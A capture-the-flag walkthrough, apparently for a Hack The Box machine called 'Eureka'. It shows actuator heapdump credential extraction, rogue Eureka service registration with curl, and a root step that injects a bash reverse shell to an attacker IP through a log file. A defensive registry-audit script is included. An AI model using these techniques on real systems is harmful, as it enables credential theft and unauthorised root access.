Eureka
Recon
  Port scanning shows 3 open TCP ports: 22, 80 and 8761.
  10.10.11.66 redirects to furni.htb, added to /etc/hosts
  As for port 8761, I googled the port and it is related to Spring Boot
  Used the SecLists Spring Boot wordlist to fuzz furni.htb
 ffuf -w /opt/wordlists/SecLists/Discovery/Web-Content/spring-boot.txt -u http://furni.htb/FUZZ
  This shows a lot of exposed files in the /actuator/* directory.
  Downloaded http://furni.htb/actuator/heapdump
Initial Foothold
  Using strings and grep, we get the password of user oscar
 strings heapdump | grep "password="
 {password=0sc@r190_S0l!dP@sswd, user=oscar190}!
  We also get another username and password
 strings heapdump | grep PWD
 http://EurekaSrvr:0scarPWDisTheB3st@localhost:8761/eureka/!
  SSH Port Forward 8761 to yourself:
 ssh -L 8761:localhost:8761 oscar190@10.10.11.66
 Password: 0sc@r190_S0l!dP@sswd
Privilege Escalation 1
  Now you have access to Eureka Admin at http://localhost:8761
  Start a netcat listener to receive the connection: nc -lvnp 8081
  Register a malicious fake service
  Register a "new" instance like this (change YOURIP to your tun0 IP)
 curl -X POST http://EurekaSrvr:0scarPWDisTheB3st@127.0.0.1:8761/eureka/apps/USER-MANAGEMENT-SERVICE -H 'Content-Type: application/json' -d '{
   "instance": {
     "instanceId": "USER-MANAGEMENT-SERVICE",
     "hostName": "YOURIP",
     "app": "USER-MANAGEMENT-SERVICE",
     "ipAddr": "YOURIP",
     "vipAddress": "USER-MANAGEMENT-SERVICE",
     "secureVipAddress": "USER-MANAGEMENT-SERVICE",
     "status": "UP",
     "port": { "$": 8081, "@enabled": "true" },
     "dataCenterInfo": {
       "@class": "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo",
       "name": "MyOwn"
     }
   }
 }'
  You are impersonating USER-MANAGEMENT-SERVICE
  Wait for 2 minutes to get a connection in your netcat listener with credentials: username miranda-wise and password IL!veT0Be&BeT0L0ve
  Now SSH in using those credentials
 ssh miranda-wise@10.10.11.66
 Password: IL!veT0Be&BeT0L0ve
 cat user.txt
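  A defensive check for the rogue registration shown above, as an added example that is not part of the original writeup: it audits a Eureka /eureka/apps JSON listing and flags instances whose ipAddr or hostName points outside the networks where services are expected to run. The sample registry, its addresses and the allowed CIDR ranges are constructed assumptions.

```python
import ipaddress

# Constructed sample of a GET /eureka/apps JSON listing (not captured from the box).
# Addresses, the APP-GATEWAY entry and the first instanceId are made up.
SAMPLE_REGISTRY = {"applications": {"application": [
    {"name": "USER-MANAGEMENT-SERVICE", "instance": [
        {"instanceId": "localhost:USER-MANAGEMENT-SERVICE:8081",
         "hostName": "localhost", "ipAddr": "127.0.0.1", "status": "UP"},
        {"instanceId": "USER-MANAGEMENT-SERVICE",
         "hostName": "198.51.100.7", "ipAddr": "198.51.100.7", "status": "UP"},
    ]},
    # Some Eureka JSON encoders emit a lone instance as an object, not a list.
    {"name": "APP-GATEWAY", "instance":
        {"instanceId": "localhost:app-gateway:8080",
         "hostName": "localhost", "ipAddr": "10.0.0.5", "status": "UP"}},
]}}

def _as_list(value):
    """Normalise the 'single object or list of objects' encoding."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]

def _ip(value):
    """Return an ip_address for an IP literal, or None for names/garbage."""
    try:
        return ipaddress.ip_address(value)
    except ValueError:
        return None

def audit_registry(registry, allowed_cidrs):
    """Return (app, instanceId, reasons) for instances that point off-network."""
    nets = [ipaddress.ip_network(c) for c in allowed_cidrs]
    findings = []
    for app in _as_list(registry.get("applications", {}).get("application")):
        for inst in _as_list(app.get("instance")):
            ip, host = _ip(inst.get("ipAddr", "")), _ip(inst.get("hostName", ""))
            reasons = []
            if ip is None or not any(ip in n for n in nets):
                reasons.append("ipAddr outside allowed networks")
            # hostName is only checked when it is an IP literal; names need DNS.
            if host is not None and not any(host in n for n in nets):
                reasons.append("hostName is an off-network IP literal")
            if reasons:
                findings.append((app.get("name"), inst.get("instanceId"), reasons))
    return findings

if __name__ == "__main__":
    for finding in audit_registry(SAMPLE_REGISTRY, ["127.0.0.0/8", "10.0.0.0/8"]):
        print(finding)
```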
Privilege Escalation 2: rooting
  On the attacker machine:
 nc -nlvp 9999
  Then, in the SSH shell on the target:
 rm -f /var/www/web/user-management-service/log/application.log
 echo 'HTTP Status: x[$(/bin/bash -i >& /dev/tcp/<YOUR-IP>/9999 0>&1)]' > /var/www/web/user-management-service/log/application.log
  Wait for two minutes and you will get a root shell in your listener
Now just cat /root/root.txt in the netcat shell